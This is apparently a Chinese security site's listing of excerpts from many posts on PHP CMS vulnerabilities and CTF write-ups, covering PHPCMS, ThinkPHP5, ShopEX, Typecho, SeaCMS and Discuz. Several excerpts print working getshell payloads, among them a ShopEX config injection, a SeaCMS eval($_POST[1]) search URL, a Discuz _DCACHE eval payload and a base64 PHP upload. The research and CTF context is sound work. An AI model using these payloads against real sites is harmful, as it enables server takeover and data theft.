弄了3天了  这个点 总结一下这三天的坑吧 0X01 注入点入手 /index.php?m=wap&c=index&a=init&siteid=1 获取cookie 传给 userid_flash=686dzK2pLsN_cv_pbJlCjvsm-ex_mCiOG90mXzt4 然后 构造SQL语句 /index.php?m=attachment&c=attachments&a=swfupload_json&aid=&src=%26id=%*+and…

PHPCMS9.6.0最新版中,由于/modules/attachment/attachments.php的过滤函数的缺陷导致了可以绕过它的过滤机制形成SQL注入漏洞,可导致数据库中数据泄漏. 而且在前台上传文件处,没有对文件后缀进行严格的审查,导致可以前台GETSHELL,直接获取到了网站的权限.点击马上实验,i春秋安全专家带你体验漏洞成因及危害. https://www.ichunqiu.com/course/58003  课程详解 DEF CON 24·400米之外破解你的智能蓝牙锁(公开…

phpcms9.6 注入分析 漏洞促发点\phpcms\modules\content\down.php $a_k = trim($_GET['a_k']); if(!isset($a_k)) showmessage(L('illegal_parameters')); $a_k = sys_auth($a_k, 'DECODE', pc_base::load_config('system','auth_key')); if(empty($a_k)) showmessage(L('illegal_…

0×00 背景 网站为了实现加速访问,会将用户访问过的页面存入缓存来减小数据库查询的开销.而Thinkphp5框架的缓存漏洞使得在缓存中注入代码成为可能.(漏洞详情见参考资料) 本文将会详细讲解: 1. 如何判断缓存漏洞存在的可能性 2. 如何利用Thinkphp5的框架漏洞结合网站的一些配置实现前台getshell 希望可以给予读者一些关于漏洞应用的启发. 0×01 环境 测试环境 1.某基于Thinkphp5.0.10搭建的论坛类测试网站 2.apache2 3.php5.6及以上版本,相关…

ShopEX 4.8.5.81822 前台Getshell 作者:unhonker   发布:2014-06-23 00:12   分类:漏洞公布   被撸:8,179次   抢沙发     利用方式:Post提交 Post Data conf_key=<!--?php phpinfo();?-->.yyyyy&conf_val=test 至 http://127.0.0.1/shopex-single-4.8.5.81822/api.php?act=set_shopex_conf&a…

phpcms v9 前台getshell脚本 用法:python phpcmsv9getshell.py http://baidu.com # -*- coding:utf-8 -*- ''' ---------------------- Author : Akkuman Blog : hacktech.cn ---------------------- ''' import requests import sys from datetime import datetime def getTim…

PHP7CMS 无条件前台GETSHELL Version:2018-10-09 //最新版中以修复此漏洞 这个漏洞很简单,如果作者在写代码的时候考虑到一点点安全方面,其实都可以避免的.   01 02 03 04 05 06 07 08 09 10 11 12 // php7cms/Core/Controllers/Api/Api.php // 52~61 line public function save_form_data() {       $rt = \Phpcmf\Service::…

Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了命令执行. 影响范围:理论上这个漏洞影响Typecho 1.1(15.5.12)之前的版本 首先我还是记录一下敏感目录 http://127.0.0.1/typecho0.9/install.php http://127.0.0.1/typecho0.9/install.php?finish&use…

12年爆出的一个洞 前几天比赛的一个cms  于是跟出题人表哥要过来审计了看看 漏洞文件再根目录thumb.php中 <?php /* * 自动缩略图 参数 url|w|h|type="cut/full"|mark="text/image|r" * thumb.php?url=/thinksns/data/userface/000/00/00/41_middle_face.jpg?1247718988&w=20&h=20 */ error_re…

0x00 前言 这套系统搞了有点久了,漏洞是发现了,但一直卡在某个地方迟迟没拿下来. 下面就分享一下自己审这套系统的整个过程. 0x01 系统简介 略   0x02 审计入口 看到inc\function\global.php 文件 这套系统用了360的防护代码 对get,post,cookie都进行了过滤,但有一点挺有趣的. 在p=admin的时候,post数据是不会过滤的,目测后台是有sql执行这样的功能.(后台还没看) 在下面发现,对get,post数据进行了全局变量注册.可以考虑有没有全…

1.环境: php5.5.38+apache+seacms v6.45 seacms目录结构: │─admin //后台管理目录 │ │─coplugins //已停用目录 │ │─ebak //帝国备份王数据备份 │ │─editor //编辑器 │ │─img //后台静态文件 │ │─js //后台js文件 │ │─templets //后台模板文件 │─article //文章内容页 │─articlelist //文章列表页 │─comment //评论 │ │─api //评论接口文…

1.环境: php5.5.38+apache+seacms v6.54 上一篇文章针对seacms v6.45 进行了分析,官方给出针对修复前台geishell提供的方法为增加: $order = ($order == "commend" || $order == "time" || $order == "hit") ? $order : ""; 并且在v6.54中增加了对传入变量的长度限制,限制为20个字符之内,因此单一针对…

环境搭建 源码下载:https://github.com/typecho/typecho/archive/v1.1-15.5.12-beta.zip 下载后部署到web根目录,然后进行安装即可,其中注意要提前在mysql中创建一个对应的数据库. 漏洞分析 漏洞起始点前的障碍清除 先是一个refer检测,填写一个站内地址即可 $_SERVER中到底哪些是可以通过客户端进行控制的呢??? 漏洞起始点 . 全局搜索所有的__wakeup函数和__destruct函数,但似乎都没有利用点 按照之前的思路…

EXP: 执行phpinfo()语句: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo(); 利用POST传值带入执行语句: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval($_POST[c])%3B; 利用条件: 1…

来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0137991.html 先通过uc_key把恶意代码保存在/uc_client/data/cache/badwords.php,然后利用preg_replace() 进行任意代码执行. 先附上来源中的脚本.修改了一些代码. <?php $timestamp = time()+10*3600; $host="ip地址"; $agent= md5("Mozilla/5.…

漏洞地址:http://www.sch01ar.com/index.php/api/Uploadify/preview 这样子说明存在漏洞 对 <?php phpinfo(); 进行 base64 编码 构造: data:image/php;base64,PD9waHAgcGhwaW5mbygpOyA= 通过 post 方式发生数据 返回了结果地址,访问一下 成功…

题目在i春秋ctf训练营 又是一道cms的通用漏洞的题,直接去百度查看通用漏洞 这里我使用的是以下这个漏洞: 海洋CMS V6.28代码执行0day 按照给出的payload,直接访问url+/search.php?searchtype=5&tid=&area=eval($_POST[1]) 之后用菜刀连接,但乍一看并没有flag.php 反手去查了一下海洋cms的数据库配置文件的存放地址: 出去用菜刀连接数据库 编辑完成后右键数据库管理,可以看到flag了…

一.漏洞分析 漏洞触发点search.php 211-213行 跟进parseIf 函数 ./include/main.class.php 这里要注意 3118行的位置,可以看到未做任何处理的eval 二.触发条件 if(intval($searchtype)==5) if (strpos($content,'{if:')=== true) {if:(.*?)}(.*?){end if} if (strpos($strThen,$labelRule2)===false) if (strpos($…

我们真的了解SQL注入吗? 不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动.在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一.SQL注入,包括常规注入场景.exp表达式注入场景.Action参数绑定注入场景和组合注入. 推荐1   Thinkphp where注入(ThinkPHP框架审计 )  << 点击获取   ThinkPHP是一个快速.简单的基于MVC和面向对象的轻量级PHP开发框架,遵循Apach…

近期有很多小伙伴在后台留言想看关于代码审计的文章,其实有关审计的文章网上资源是比较多的,但是从代码审计开始到结束的这类文章却少之甚少. 今天要讲解的ZZZPHP1.61这套审计漏洞比较多,SQL注入漏洞.任意文件删除漏洞.任意文件读取漏洞.远程执行漏洞,当中也借助了漏扫工具,内容涵盖全面,分析透彻,学完定会受益匪浅! 注:文章还是原来的方式,先复现后分析,阅读用时约7分钟. SQL注入漏洞(获取管理员密码) 漏洞复现 payload: GET /search/ HTTP/1.1 Host: 12…

本文作者:i春秋作家——索马里的海贼 前言上一回(http://bbs.ichunqiu.com/thread-13714-1-1.html)说到快速漏洞挖掘中的几个重点关注对象,命令执行,文件操作,sql注入.并且拿sql做为例子简单做了一次代码审计,今天换一个思路,从文件操作部分入手,毕竟 文件操作一个搞不好就是getshell,比起注入按部就班慢慢来可要爽快多了. 一.关注重点 对于文件操作部分来说,首先对php内置的文件操作函数的作用和特性要有一个大概的了解 file_get_conte…

ThinkSNS漏洞系列第一弹,某处处理不当导致SQL注入 漏洞点出现在Comment Widget里:\addons\widget\CommentWidget\CommentWidget.class.php:138/*** 添加评论的操作** @return array 评论添加状态和提示信息*/public function addcomment() {// 返回结果集默认值$return = array ('status' => 0,'data' => L ( 'PUBLIC_CONCE…

渗透测试入门 我很简单,请不要欺负我 网站综合渗透实验: 真的很简单: 你是会员吗: 2015中国网络安全大赛 一.代码执行: 同DZ漏洞全家桶中的"又见DZ,我能那你怎么办". 二.Session欺骗:(so奇葩) www.xxx.xxx/admin/ 存在目录遍历: 禁用JS后居然可以获取后台! 不仅有后台,而且可以修改管理员密码! 在软件上传栏目中,系统使用白名单,可以直接上传php: Getshell. 三.越权访问: 帝国备份王,万能Cookie漏洞: BurpSuit 自动…

其实学习struts等框架,不仅要知道怎么用,我们还应该多去看看框架的源码,知道为什么可以这样使用,凡事都知道为什么,以这样的态度学习,我们才能更加深一步的理解原理好实现方式,本类博客主要是个人学习总结.如有不足之处,请多多指教,以便我能更快的进步.!!!! 1.获取reqesut和response对象方法 Map request = (Map)ActionContext.getContext().get("request"); HttpServletRequest request =…

Php注入攻击是现今最流行的攻击方式,依靠它强大的灵活性吸引了广大黑迷. 在上一期的<php安全与注射专题>中林.linx主要讲述了php程序的各种漏洞,也讲到了php+mysql注入的问题,可是讲的注入的问题比较少,让我们感觉没有尽兴是吧. OK,这一期我将给大家伙仔仔细细的吹一吹php+mysql注入,一定让你满载而归哦(谁扔砖头哩!). 本文主要是为小菜们服务的,如果你已经是一只老鸟呢,可能某些东西会感觉比较乏味,但只要你仔细的看,你会发现很多有趣的东西哦. 阅读此文你只要明白下面的这点…

今晚简单来看看那天比赛的源码吧,比赛的时候还是有些慌没有好好去静下心看代码. awd给的题中的漏洞,都是那种可以快速让你利用拿到权限后得到flag的那种,特别复杂利用的一般没有. 建议先黑盒去尝试,例如前台上传,后台上传,等等,执行失败再来结合代码审计看看是否可以绕过利用. 所以审计中重点关注预留后门,注入,文件上传,命令/代码执行. 0x01 预留后门 没有太多套路和隐藏 就是明显的马 比较有意思的是第一个大马. 当时以为就是普通的$pass  = 'ec38fe2a8497e0a8d6d34…

PHP审计之PHP反序列化漏洞 前言 一直不懂,PHP反序列化感觉上比Java的反序列化难上不少.但归根结底还是serialize和unserialize中的一些问题. 在此不做多的介绍. 魔术方法 在php的反序列化中会用到各种魔术方法 __wakeup() //使用unserialize时触发 __sleep() //使用serialize时触发 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在…

打靶笔记-02-vulhub-Hackademic.RTB1 一.靶机信息 Name: Hackademic: RTB1(中等难度) Date release: 6 Sep 2011 Author: mr.pr0n Series: Hackademic 二.靶机启动 2.1 校验靶机文件 sha1sum Hackademic.RTB1.zip e1d82e32d3a0353da3c35aa91716b711907ac826 Hackademic.RTB1.zip 2.2 解压导入VMware启动…

论PHP常见的漏洞 ′ 雨. · 2015/01/14 10:08 0x00 前言 里面很多都是像laterain学习到的, 如果能考上cuit的话 自动献菊花了. 0x01 安装的问题 首先拿到一份源码 肯定是先install上. 而在安装文件上又会经常出现问题. 一般的安装文件在安装完成后 基本上都不会自动删除这个安装的文件 我遇到过的会自动删除的好像也就qibocms了. 其他的基本都是通过生成一个lock文件 来判断程序是否安装过了 如果存在这个lock文件了 就会退出了. 这里首先 先…

目录 . 引言 . webshell原理介绍 . webshell的常见类型以及变种方法 . webshell的检测原理以及检测工具 . webshell隐藏反检测对抗手段 0. 引言 本文旨在研究Webshell的各种猥琐编写方式以及webshell后门的生成.检测技术,主要分享了一些webshell的编写方法以及当前对webshell的识别.检测技术的原理以及相应工具的使用,希望能给研究这一领域的朋友带来一点点帮助,同时抛砖引玉,和大家共同讨论更多的技术细节,共同学习成长 Relevant…